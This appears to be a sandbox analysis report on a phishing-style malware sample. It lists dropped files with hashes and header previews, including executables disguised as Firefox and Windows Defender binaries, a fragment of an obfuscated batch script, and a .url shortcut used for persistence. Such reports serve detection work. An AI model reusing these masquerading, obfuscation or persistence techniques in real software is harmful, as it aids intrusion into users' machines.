                                                                                                                                                                                                                        SHA-256:4C549441400A2A2BA70571F988E129FDAFBE020AE6571B61E1471867B8A40CAB
                                                                                                                                                                                                                        SHA-512:ADA89B4A8A35D294EFBEE3317BE114B1DCE21690BA6402D043F8C19E0CD6519458CA20CC973C0CE108ED8E732EAA1D463C5A0C08A5B4E7164EC0CD7069EC07B7
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1200128
                                                                                                                                                                                                                        Entropy (8bit):5.140016032789808
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZSwjCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbEH:ZvCsqjnhMgeiCl7G0nehbGZpbD5
                                                                                                                                                                                                                        MD5:43FF687714E777C54D975BC9F175FEF9
                                                                                                                                                                                                                        SHA1:4A3F24F38DCF8D7BCE3F333BA0F040464C14E3D9
                                                                                                                                                                                                                        SHA-256:065473E01751967E7FC5209FCBDD6C717DFE3C3A5276327F98E6CB1BEC5937C6
                                                                                                                                                                                                                        SHA-512:AA9D60EDBEB39D2FEFEF78F9EBF2ABBC6DD7FB7C31F32DD2A4679858EE7E03E21B2800ED7DFB06EAD3C1CE222CAA350EB2D74BB2C4814E47D409B75E17B454B0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................2r.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1408512
                                                                                                                                                                                                                        Entropy (8bit):5.441144919459244
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:jWKntIfGpUsqjnhMgeiCl7G0nehbGZpbD:i8IeaDmg27RnWGj
                                                                                                                                                                                                                        MD5:BBDC97A309A129DA4182999C14A90C75
                                                                                                                                                                                                                        SHA1:6EAD545768E73CF6642DCC1AD724CF8D1DC3A938
                                                                                                                                                                                                                        SHA-256:FDD52436B249350265F7E69E4FD7C417DA42229D09FE9A5F4B98835488F8DAE3
                                                                                                                                                                                                                        SHA-512:89760705937416F5F8D6F6F771643C9649F0C93FC748230B10C6896957E22A98F7A4FF580CEF235EBED0896AE32C07CCE99A257D18CE39DC7163524D43A1A98D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1185280
                                                                                                                                                                                                                        Entropy (8bit):5.1032885579945795
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:MIh2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:AA76A44655063807CF957D067D5B5B0F
                                                                                                                                                                                                                        SHA1:1F02757DDE0C9947CEDDF1927D76DE5135D85F4D
                                                                                                                                                                                                                        SHA-256:6FAE25D6C4C7D3380D9445317ACB836C57C4F553E39827564460A8A3FAE74707
                                                                                                                                                                                                                        SHA-512:7B5C017DF81B834CF0A9A99B4C0CD391A177A37290103C123B6840A4702CA4786F34571563E537EB5FDE3EF2461EC6C36C467A8692900B297E8224964931AC88
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1531904
                                                                                                                                                                                                                        Entropy (8bit):5.421190982297953
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:O8oREwt2ioQ3J+RHsqjnhMgeiCl7G0nehbGZpbD:O8oRpoFbDmg27RnWGj
                                                                                                                                                                                                                        MD5:109D2003493F3C63ACECE31C542F5C24
                                                                                                                                                                                                                        SHA1:0DD1735B67A4E0124AE33BA19CAFD203EC121258
                                                                                                                                                                                                                        SHA-256:7022EAE681183AD1B57E944BC2099DFB15EFF16EE609907E3F39529D780618E2
                                                                                                                                                                                                                        SHA-512:6AACE908D1DA8A471FB165E95DF51994EB155D4F3CC54E790C38A185800A9C73CADFA808A20B5F539809441E41DAA6E59E6944E0FD695B9AAA7C8653FE55C8C0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1341952
                                                                                                                                                                                                                        Entropy (8bit):5.2385898329538865
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ef8HQlDMxHwJ07wHsqjnhMgeiCl7G0nehbGZpbD:ekHQlqwJ0gDmg27RnWGj
                                                                                                                                                                                                                        MD5:0412F310533E8FCC77646C26A9FD2211
                                                                                                                                                                                                                        SHA1:D87B19BFBF099BBF5C150B2D86C5B62C191177CD
                                                                                                                                                                                                                        SHA-256:FB7667BA079E96B82C0160B1AF306E5EA25265F772485A9860C4AEAB72EF6E19
                                                                                                                                                                                                                        SHA-512:9ABA5593AA299D4413F689B112E6DD89A01726048890D407E4EB73A5C8B23CB177A2E32F04168B174AB5F51971B15F8713221D3EC0D76075330BF50B019C980B
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.....................................G.... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1534464
                                                                                                                                                                                                                        Entropy (8bit):7.124578693722774
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:oSEmYD6gjGPG45QVDkfXplyTyEsqjnhMgeiCl7G0nehbGZpbD:o5mYD6g2GWQVQf3yTHDmg27RnWGj
                                                                                                                                                                                                                        MD5:640EC5D89ACEB0A5B3115B09E3C3D84E
                                                                                                                                                                                                                        SHA1:3F7A53211532E1B91C541961239C077F047BDF75
                                                                                                                                                                                                                        SHA-256:B829D37C72262600C27C15F8070D44D8A495F57122A1E8AE97133FA8BBC7DE25
                                                                                                                                                                                                                        SHA-512:2B49AA189D6A191F62818B4AE55282CF5102654E064FE0912203B5AB5409059D7F7EF9809B08291E1DCF4E955CB201D4132218C90E7F01520BFB3806C46A0870
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\Public\Libraries\PNO

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:sy:sy
                                                                                                                                                                                                                        MD5:6FA15CB635D61101C5C1FD0D3DA7BCBE
                                                                                                                                                                                                                        SHA1:3DD7E89969F62674BB4F1E1804D12F7984CA50CB
                                                                                                                                                                                                                        SHA-256:A7A13D1B48050194EC1A629253456D89916E51DFC6A641096CC0D4F007BC6C9C
                                                                                                                                                                                                                        SHA-512:929970595BA4B524C60F9275EBAC75F31978141ACE593AAD10BC4CEC527B22B22A1B1210340169DC2D040E2E5A1A2562C81C2DF6D1A5918224A499075A54248D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:98..

                                                                                                                                                                                                                        C:\Users\Public\Libraries\Sdvvfamy

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1644384
                                                                                                                                                                                                                        Entropy (8bit):7.201679795231161
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:x2ZbSbxvfLzOaLw2sBejF/LHHclwHXQyXIFBe+Z:xqSbxfOv2sexzHPpXIFBlZ
                                                                                                                                                                                                                        MD5:60E35BCBEC840DBC57F6E96F07092037
                                                                                                                                                                                                                        SHA1:FB4BADFCA8BA6EDE36D462A33455EAD2536C5EA5
                                                                                                                                                                                                                        SHA-256:D3150ADC33A74030DE51CA0E850B5FB4465BE2A5BCFB023DD4CDD4196B258A49
                                                                                                                                                                                                                        SHA-512:C685B9A169F6F034F40999BB11446522E05622FB50B86DC11A6992945C8EC31B9EDC20345897B247BB08118919F46B43F49C7518BA0115A7D8DA52C84A2229AC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:...Y#..K..%.&.......&""..'"....$.$..".%#..&#"$!... .....&.........."..'..$.#.........&&...%..!". .&......%.'...'..."$.&....Y#..K..##...&......Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e. ......O.L...+....,....,....f....<

                                                                                                                                                                                                                        C:\Users\Public\Libraries\ymafvvdS.cmd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):62357
                                                                                                                                                                                                                        Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                                                                        C:\Users\Public\Libraries\ymafvvdS.pif

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                        Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                        MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                        SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                        SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                        SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                                                        C:\Users\Public\Sdvvfamy.url

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                                                                        Entropy (8bit):5.17500507473634
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMoPKaOsbxTRefAlv:HRYFVmTWDyz5xOExsolv
                                                                                                                                                                                                                        MD5:7B16FB7DD80B4298C6D276AB24CFDBDC
                                                                                                                                                                                                                        SHA1:53E7996E8B25BB22DF05A53F77B6B25042B4B4E1
                                                                                                                                                                                                                        SHA-256:94204017ED604221DAF7742713C8E266B5F256C74DA6F1823A44FC66FD3732E6
                                                                                                                                                                                                                        SHA-512:7C23CE95763FE85E2E763A32817849B0C907F0DD7493A74A7E3BC2003F6783E5B4F62FE4A719379C92A6D1A649BEEA58F616CB5DB9EAF91AE2EEE9DFEE91BF5E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF"..IconIndex=931417..HotKey=16..

                                                                                                                                                                                                                        C:\Users\Public\alpha.pif

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):236544
                                                                                                                                                                                                                        Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                        MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                        SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                        SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\Public\xpha.pif

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18944
                                                                                                                                                                                                                        Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                        MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                        SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                        SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                        SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\3f155f6931e417df.bin

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                        Entropy (8bit):7.986344012767398
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:VchnlVgF4rjKX+5xC7ZBfVb9kW9M7r4BfDmUJzrDJGc+rgeVJ6sIr:VcKFCeX+5xeD/Kwbmo4Hrr0sIr
                                                                                                                                                                                                                        MD5:8566466B1184D8B575286A62054CF982
                                                                                                                                                                                                                        SHA1:CF9E9374D630CE5354CA60CC93AF07370EA6191A
                                                                                                                                                                                                                        SHA-256:0F86B53FA2EE81D05BEE3194E5440AE0C60DA46BEECBB0C93D6C64FFD2CE2F2C
                                                                                                                                                                                                                        SHA-512:6F3101E296853FC48D66E534B5B11F49910ED404C986339FB0BC016DDDD68984CDB69B10766B82BD880CEAA73EBCCD399FD9E561BBFAB37927CA004D8E43A92B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:....2...t.2.v..X...E....`...&Y+.6..;...o.Tfl..t./y;j.u..j........w.........m{9..NxY........NYc.#$...OI.q.J...#..].\.s.Z..T......8.q.:......A.aw.]%.].....:{.1<..Zq...X...*2o.&..D6..R..6/........bi.<....O..,..-O......y.Z/.tR....R.^I....-L.......|-!...`a..A......f.....JbI.o.V.[4m.".(Z.6..=9..7.8{..t...+4...l.@...q..7j..Dy..Ob{.....;e:........5.6v..........g<s...l.s..a(r.?..K...7.yl.[.u[:j.)!e....,2...8..4...R(..z.|...i(.......g..Ng;E..hw...y. n..r.?..%^..IDPv3!a......:}H..#j)...L.........n...U. @..~.iP..}......(2..(d.k.a.%.,.".O.....9.$G..3....,..o.0S7........N2.,-.O.+B....u^...[.t".).U.T.2s.y.]g.....v...l...'..hs.7 "..^.....|cJ......!.r.j.5.....c..Yz.O.+H#...W....&A.$".zk"...t.$sEfM..2$.c.....g..B.<.X........z#......Az.FL6....V..*F..`.9...........c........@~.......R...s..J....qQ...4(..{F....w......[V....6{.9.....j.%.b"...4...6.O....`.6...3. .....T.......].^F..e.}.I.*0-......dIH2....br...pk...&G.vfj..Xv..i...$>.ogx.W.N.....m.....O^.7...`lR*X....^

                                                                                                                                                                                                                        C:\Windows\DtcInstall.log

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):2313
                                                                                                                                                                                                                        Entropy (8bit):5.130024832551288
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786m:Z070s0Y0q0mF7Dm59
                                                                                                                                                                                                                        MD5:0856C129304C327251231FD67257DDA8
                                                                                                                                                                                                                        SHA1:24D5F8EDD8DE135F367BD28A9E484238B5DB5DC2
                                                                                                                                                                                                                        SHA-256:F288D1F23C444E6A42AD89120FE84E6F4327C9E1766CB6845FB73FB557B1A85C
                                                                                                                                                                                                                        SHA-512:C79FBDCE7C451377A29328D89245DE2303E3A887FCEA8F08C234AB9234360438B20B67D7D91AF97D61B27BC653E24F0B4D636C49C05F099843B811714CCC0231
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                                                                        C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1150976
                                                                                                                                                                                                                        Entropy (8bit):5.038913337481986
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:eJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eJsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:B5FDD433E07825BDB9C6B8F563B00FDE
                                                                                                                                                                                                                        SHA1:088BA8DA725FEFC5FBA54D95A3738C14B62817ED
                                                                                                                                                                                                                        SHA-256:A0CCDD661623B7E31B4F1959B87AC057382A9B6F2063E257839496ED3506450D
                                                                                                                                                                                                                        SHA-512:24191C8E46F184B69EC048BDA9BC13DFB848C405E59889AF1E76B194D1B4F2266D75674DD74F31F7E73136B8D97D0E0853A4FA6A89D72E5DC8AE5DF382CA3F1D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................v............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Windows\System32\AgentService.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                        Entropy (8bit):6.97430492464371
                                                                                                                                                                                                                        Encrypted:false
